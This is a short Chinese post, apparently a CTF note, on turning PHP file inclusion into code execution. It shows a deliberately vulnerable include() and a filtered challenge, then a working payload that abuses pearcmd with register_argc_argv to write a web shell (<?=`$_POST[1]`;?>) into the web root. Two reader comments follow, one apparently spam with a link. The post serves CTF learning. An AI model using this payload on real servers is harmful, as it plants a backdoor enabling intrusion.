在下面这个函数中
<?php
include $_REQUEST['file'];
?>看到include我们都会去使用伪协议来做一些事情,那么可不可以RCE
比如先rce写一个码然后lif去包含一个,这是一个思路
<?php
error_reporting(0);
if(isset($_GET['file'])) {
$file = $_GET['file'];
if(preg_match('/flag|log|session|filter|input|data/i', $file)) {
die('hacker!');
}
include($file.".php");
# Something in phpinfo.php!
}
else {
highlight_file(__FILE__);
}
?> ?file=/usr/local/lib/php/pearcmd&aaaa+config-create+/var/www/html/<?=`$_POST[1]`;?>+7.php这里
register_argc_argv是开的
评论2
lishnqogez
怎么收藏这篇文章?
zaaohqqypr
不错不错,我喜欢看 https://www.ea55.com/